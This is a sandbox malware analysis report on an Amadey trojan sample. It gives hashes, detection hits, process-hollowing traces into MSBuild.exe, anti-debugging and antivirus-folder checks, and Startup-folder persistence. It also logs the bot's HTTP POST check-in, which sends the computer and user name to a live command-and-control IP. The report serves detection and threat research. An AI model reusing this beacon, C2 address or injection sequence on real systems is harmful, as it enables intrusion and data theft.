Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 26, 2023, 7:41 p.m.	Sept. 26, 2023, 7:45 p.m.

Size	3.3MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`2421112335f8c112d36630dc0e0be4e2`
SHA256	`6d4b4f1cbf70d750ea151babfa6b5470b36d54292a7d2c30ec79d25e761df74d`
CRC32	`13ABD3B5`
ssdeep	`49152:3X5xcGOzAd/3o44bG8Z9H+o/xBTvV338yQh29vz3hKsCVqdq4dsI:3X5xcG5sBNHTN3wh2p3osCVqk4dsI`
PDB Path	jonnycowboy67323men.pdb
Yara	Admin_Tool_IN_Zero - Admin Tool Sysinternals UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature IsPE32 - (no description) Is_DotNET_EXE - (no description)

amday.exe "C:\Users\test22\AppData\Local\Temp\amday.exe"
2564
- MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
  2756
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
45.9.74.182	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49165 -> 45.9.74.182:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 45.9.74.182:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Sept. 26, 2023, 7:41 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Sept. 26, 2023, 7:41 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 26, 2023, 7:41 p.m.			0	0
IsDebuggerPresent Sept. 26, 2023, 7:41 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 26, 2023, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004097f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 26, 2023, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004097f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 26, 2023, 7:41 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004098b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

jonnycowboy67323men.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 26, 2023, 7:41 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.sdata

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header, POST method with no useragent header, Connection to IP address

suspicious_request

POST http://45.9.74.182/b7djSDcPcZ/index.php

Performs some HTTP requests (1 event)

request

POST http://45.9.74.182/b7djSDcPcZ/index.php

Sends data using the HTTP POST Method (1 event)

request

POST http://45.9.74.182/b7djSDcPcZ/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 57 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00540000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00600000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00630000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b05000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00586000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ce000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005cf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0481f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\Protect544cd51a.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edddegyjjykj.lnk

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edddegyjjykj.lnk

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\Protect544cd51a.dll

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x002ff400', u'virtual_address': u'0x00002000', u'entropy': 7.841455210678139, u'name': u'.text', u'virtual_size': u'0x002ff294'}

entropy

7.84145521068

description

A section with a high entropy has been found

entropy

0.905176227695

description

Overall entropy of this PE file is high

Yara rule detected in process memory (12 events)

description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over HTTP	rule	Network_HTTP
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 3e25fe7bacb5b578330e4b1f3b078448fa4db380
buffer	Buffer with sha1: edcc59f8095eee70cdc811173981770971f4540a

Communicates with host for which no DNS query was performed (1 event)

host

45.9.74.182

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2756 region_size: 241664 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002a0	1	0	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edddegyjjykj.lnk

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPEL8üÇdàÒ¯<°@°@è+dpàP!ppà@°.text `.rdata° @@.dataÀ$@(@À.rsrcàp@@@.relocP!"B@B base_address: 0x00400000 process_identifier: 2756 process_handle: 0x000002a0	1	1
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: 0 H`p}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00437000 process_identifier: 2756 process_handle: 0x000002a0	1	1
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2756 process_handle: 0x000002a0	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPEL8üÇdàÒ¯<°@°@è+dpàP!ppà@°.text `.rdata° @@.dataÀ$@(@À.rsrcàp@@@.relocP!"B@B base_address: 0x00400000 process_identifier: 2756 process_handle: 0x000002a0	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2564 called NtSetContextThread to modify thread in remote process 2756
NtSetContextThread Sept. 26, 2023, 7:41 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4275375 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000029c process_identifier: 2756	1	0	0

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (2 events)

Time & API	Arguments	Status	Return	Repeated
HttpSendRequestA Sept. 26, 2023, 7:41 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.86&sd=ab432c&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1	0
HttpSendRequestA Sept. 26, 2023, 7:41 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.86&sd=ab432c&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2564 resumed a thread in remote process 2756
NtResumeThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2756	1	0	0

Executed a process and injected code into it, probably while unpacking (20 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2564	1	0
NtResumeThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 2564	1	0
NtResumeThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 2564	1	0
NtResumeThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x0000022c suspend_count: 1 process_identifier: 2564	1	0
NtGetContextThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x000000ec	1	0
NtGetContextThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x000000ec	1	0
NtResumeThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x000000ec suspend_count: 1 process_identifier: 2564	1	0
CreateProcessInternalW Sept. 26, 2023, 7:41 p.m.	thread_identifier: 2760 thread_handle: 0x0000029c process_identifier: 2756 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002a0	1	1
NtGetContextThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x0000029c	1	0
NtAllocateVirtualMemory Sept. 26, 2023, 7:41 p.m.	process_identifier: 2756 region_size: 241664 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002a0	1	0
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPEL8üÇdàÒ¯<°@°@è+dpàP!ppà@°.text `.rdata° @@.dataÀ$@(@À.rsrcàp@@@.relocP!"B@B base_address: 0x00400000 process_identifier: 2756 process_handle: 0x000002a0	1	1
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: base_address: 0x00401000 process_identifier: 2756 process_handle: 0x000002a0	1	1
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: base_address: 0x0042b000 process_identifier: 2756 process_handle: 0x000002a0	1	1
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: base_address: 0x00434000 process_identifier: 2756 process_handle: 0x000002a0	1	1
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: 0 H`p}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00437000 process_identifier: 2756 process_handle: 0x000002a0	1	1
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: base_address: 0x00438000 process_identifier: 2756 process_handle: 0x000002a0	1	1
WriteProcessMemory Sept. 26, 2023, 7:41 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2756 process_handle: 0x000002a0	1	1
NtSetContextThread Sept. 26, 2023, 7:41 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4275375 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000029c process_identifier: 2756	1	0
NtResumeThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2756	1	0
NtResumeThread Sept. 26, 2023, 7:41 p.m.	thread_handle: 0x000000f0 suspend_count: 1 process_identifier: 2756	1	0

File has been identified by 53 AntiVirus engines on VirusTotal as malicious (50 out of 53 events)

Lionic	Trojan.Win32.Generic.4!c
MicroWorld-eScan	Trojan.GenericKD.68503414
FireEye	Generic.mg.2421112335f8c112
CAT-QuickHeal	Trojan.IGENERIC
McAfee	Artemis!2421112335F8
Malwarebytes	Trojan.MalPack
Sangfor	Suspicious.Win32.Save.a
K7AntiVirus	Trojan ( 005a98481 )
BitDefender	Trojan.GenericKD.68503414
K7GW	Trojan ( 005a98481 )
Cybereason	malicious.8811f9
VirIT	Trojan.Win32.MSIL_Heur.A
Cyren	W32/ABRisk.UQVH-3974
